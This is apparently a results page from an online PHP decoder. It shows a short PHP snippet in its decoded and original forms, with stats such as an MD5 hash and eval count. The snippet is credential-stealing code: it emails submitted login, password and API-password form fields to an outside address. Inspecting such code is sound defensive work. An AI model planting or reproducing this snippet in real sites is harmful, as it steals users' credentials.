Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php mail('[email protected]', 'Perubahan passworrd '.$_SERVER['HTTP_HOST'].'', ''.s..
Decoded Output download
<?php
mail('[email protected]', 'Perubahan passworrd '.$_SERVER['HTTP_HOST'].'', ''.str_replace("'", "\'", $_POST['ulog']).'<br/>'.str_replace("'", "\'", $_POST['passlog']).'<br/>'.str_replace("'", "\'", $_POST['passapi2']).'', "From:adminx@'.$_SERVER['HTTP_HOST']);
?>
Did this file decode correctly?
Original Code
<?php
mail('[email protected]', 'Perubahan passworrd '.$_SERVER['HTTP_HOST'].'', ''.str_replace("'", "\'", $_POST['ulog']).'<br/>'.str_replace("'", "\'", $_POST['passlog']).'<br/>'.str_replace("'", "\'", $_POST['passapi2']).'', "From:adminx@'.$_SERVER['HTTP_HOST']);
?>
Function Calls
| None |
Stats
| MD5 | 129ef03e56983ecb8729bbc9d13f9600 |
| Eval Count | 0 |
| Decode Time | 112 ms |